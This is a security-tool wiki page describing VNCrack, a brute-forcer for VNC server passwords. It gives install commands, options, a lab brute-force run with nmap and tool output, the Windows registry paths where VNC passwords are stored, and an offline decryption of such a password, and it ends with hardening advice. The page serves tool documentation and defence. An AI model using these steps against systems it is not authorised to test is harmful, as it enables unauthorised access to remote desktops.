Vncrack

From aldeid
Jump to navigation Jump to search

Description

VNCrack is a brute-forcer against VNC Server service.

Installation

$ cd /data/src/
$ wget http://www.phenoelit-us.org/vncrack/vncrack_src-1.21.tar.gz
$ tar xzvf vncrack_src-1.21.tar.gz

Usage

Basic usage

The most common use is the remote access:

./vncrack -h <target> -w <wordlist> [options]

But you can also use the password mode:

./vncrack -C /home/some/user/.vnc/passwd

To use the interactive mode, syntax is:

./vncrack -W

Options

Options for online mode

-v
verbose mode
-d N
Sleep N nanoseconds between each try
-D N
Sleep N seconds between each try
-a
Just a funny thing
-p P
connect to port P instead of 5900
-s N
Sleep N seconds in case connect() failed

Options for PHoss intercepted challenges

-c <challenge>
challenge from PHoss output
-r <response>
response from PHoss output

Options for intercepted MSLogon challenges

-x <challenge>
challenge output
-y <response>
response output

Example

Online brute-force

Our test platform (192.168.100.18) is running VNC Server on port 5900/tcp, as well as a VNC http interface on port 5800/tcp:

$ sudo nmap -sS 192.168.100.18

Starting Nmap 5.00 ( http://nmap.org ) at 2010-10-25 18:21 CEST
Interesting ports on 192.168.100.18:
Not shown: 993 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
5800/tcp open  vnc-http
5900/tcp open  vnc
MAC Address: 00:04:AC:D3:37:29 (IBM)

Nmap done: 1 IP address (1 host up) scanned in 2.53 seconds

We can now brute-force VNC authentication:

$ ./vncrack -h 192.168.100.18 -w /data/dict/test.txt -v

VNCrack - by Phenoelit (http://www.phenoelit.de/)
$Revision: 1.21 $
trying 'oops' ...failed
trying '123' ...Server told me: connection close
Server says: 
        Waiting for blocking disable
trying '123' ...failed
trying '1234' ...Server told me: connection close
Server says: 
        Waiting for blocking disable
trying '1234' ...failed
trying 'all' ...Server told me: connection close
Server says: 
        Waiting for blocking disable
trying 'all' ...failed
trying 'nimda' ...Server told me: connection close
Server says: 
        Waiting for blocking disable
trying 'nimda' ...failed
trying 'administrator' ...Server told me: connection close
Server says: Your connection has been rejected.
        Waiting for blocking disable
trying 'administrator' ...failed
trying 'admin' ...Server told me: connection close
Server says: Your connection has been rejected.
        Waiting for blocking disable
trying 'admin' ...failed
trying 'pass' ...Server told me: connection close
Server says: Your connection has been rejected.
        Waiting for blocking disable
trying 'pass' ...failed
trying 'passwd' ...Server told me: connection close
Server says: 
        Waiting for blocking disable
trying 'passwd' ...failed
trying 'password' ...Server told me: connection close
Server says: 
        Waiting for blocking disable
trying 'password' ...failed
trying 'elephant' ...Server told me: connection close
Server says: Your connection has been rejected.
        Waiting for blocking disable
trying 'elephant' ...
>>>>>>>>>>>>>>>
Password: elephant
>>>>>>>>>>>>>>>

Interactive mode

On a Windows machine, the password is located in the registry, at one of these places:

  • \HKEY_CURRENT_USER\Software\ORL\WinVNC3\Password
  • \HKEY_USERS\.DEFAULT\Software\ORL\WinVNC3\Password

Vncrack-003.png

Let's crack the key:

$ ./vncrack -W
68
86
f5
9a
7c
c2
72
ef
Entered HEX String: 68 86 f5 9a 7c c2 72 ef 
VNC Password: elephant

How to enhance security of VNCServer?

Let's have a look at VNC Server's configuration screen:

Vncrack-004.png

There are many ways to enhance security of VNC Server:

  • Change default port (it won't prevent attackers from discovering the service);
  • Disable Java Web interface unless you absolutely need it;
  • Either protect the access with a strong password, or rather use Windows authentication;
  • Disable file upload unless you absolutely need it;
  • If you use VNC Server on your own machine, check "display alert box" with default behavior set to "Refuse": it will popup a confirmation box for each connection attempt, with a connection rejection as default option.

Comments

Talk:Vncrack